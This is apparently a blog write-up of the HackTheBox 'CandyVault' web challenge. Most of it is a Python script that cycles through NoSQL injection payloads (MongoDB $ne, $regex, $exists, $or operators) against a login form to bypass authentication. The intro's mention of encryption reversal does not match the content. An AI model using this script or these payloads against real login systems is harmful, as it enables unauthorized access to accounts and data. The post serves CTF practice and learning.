Post

HackTheBox CandyVault Writeup

Posted
By x3ric
3 min read

Explore the basics of cybersecurity in the CandyVault Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90

from requests.exceptions import ConnectionError
import requests
import json
import sys
import os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

base_url = get_base_url()
login_url = f"{base_url}/login"
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}
session = requests.Session()

payloads = [
    {"email": {"$ne": None}, "password": "any_password"},
    {"email": {"$exists": True}, "password": "any_password"},
    {"email": {"$regex": ".*"}, "password": "any_password"},
    {"email": {"$ne": ""}, "password": "any_password"},
    {"email": {"$gt": ""}, "password": "any_password"},
    {"email": {"$in": ["admin@example.com", {"$ne": None}]}, "password": "any_password"},
    {"email": "", "password": {"$ne": None}},
    {"email": {"$not": {"$eq": None}}, "password": "any_password"},
    {"email": "admin@example.com", "password": {"$ne": "nonexistent"}},
    {"email": {"$regex": "^a"}, "password": "any_password"},
    {"$or": [{"email": "admin@example.com"}, {"email": {"$ne": None}}], "password": "any_password"},
    {"$or": [{"email": {"$regex": "^"}}, {"password": {"$ne": None}}]},
    {"email": {"$ne": None}, "password": {"$exists": True}},
    {"email": {"$type": "string"}, "password": "any_password"},
    {"email": {"$regex": "^.*$"}, "password": {"$regex": "^.*$"}},
    {"email": {"$in": ["", "admin"]}, "password": {"$exists": True}},
    {"email": "admin@example.com", "password": {"$regex": "^.*"}},
    {"email": {"$regex": ".*"}, "password": {"$not": {"$eq": "nonexistent"}}},
    {"email": {"$exists": True}, "password": {"$exists": True}},
    {"email": {"$in": ["admin@example.com", "user@example.com", {"$ne": None}]}, "password": {"$regex": "^.*"}},
    {"email": {"$in": ["user@example.com", {"$ne": None}]}, "password": {"$ne": "nonexistent"}},
    {"email": {"$regex": "^.*@.*$"}, "password": {"$regex": "^.*$"}},
    {"email": {"$regex": "^admin"}, "password": {"$ne": "wrong_password"}},
    {"email": {"$regex": "^.*$"}, "password": {"$in": ["123456", {"$ne": "wrong_password"}]}},
    {"$or": [{"email": {"$exists": True}}, {"password": {"$exists": True}}]},
    {"email": {"$in": ["admin", "user", "root"]}, "password": {"$nin": ["wrong", "incorrect"]}},
    {"email": {"$regex": "^"}, "password": {"$not": {"$eq": "invalid"}}},
    {"email": {"$regex": "^.*$"}, "password": {"$exists": True, "$ne": "wrong"}},
    {"email": {"$regex": "^"}, "password": {"$regex": "^.*$"}},
]

def attempt_login(payload):
    max_retries = 3
    retries = 0
    while retries < max_retries:
        try:
            response = session.post(login_url, headers=headers, json=payload, allow_redirects=False)
            if response.is_redirect:
                final_url = response.headers.get("Location")
                if final_url.startswith("/"):
                    final_url = base_url + final_url
                response = session.get(final_url, headers=headers)
                return response, final_url
            return response, None
        except ConnectionError as e:
            print(f"Connection error: {e}. Retrying ({retries + 1}/{max_retries})...")
            retries += 1
    return None, None

def attack():
    successful_payloads = []
    for payload in payloads:
        response, final_url = attempt_login(payload)
        if response and "Log-in to open the doors to candy vault!" not in response.text:
            print(f"Success with payload: {json.dumps(payload)}")
            print("Flag or response:", response.text)
            successful_payloads.append(payload)
            return
        elif final_url:
            print(f"Redirected with payload {json.dumps(payload)} to {final_url}")
        else:
            print(f"Attempt failed with payload: {json.dumps(payload)}")
    if successful_payloads:
        print("\nSuccessful Payloads Discovered:", json.dumps(successful_payloads, indent=2))
    else:
        print("No successful bypasses found.")

attack()

I didn’t bother filtering for the correct one.

Summary

CandyVault is a very-easy-level challenge on Hack The Box that exploits a NoSQL injection vulnerability in the login functionality. By crafting various payloads targeting the email and password fields, the script attempts to bypass authentication using MongoDB query operators. Successful payloads allow access to restricted areas, exposing the flag. This challenge highlights the risks of unsanitized inputs and weak database query protections in NoSQL applications.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.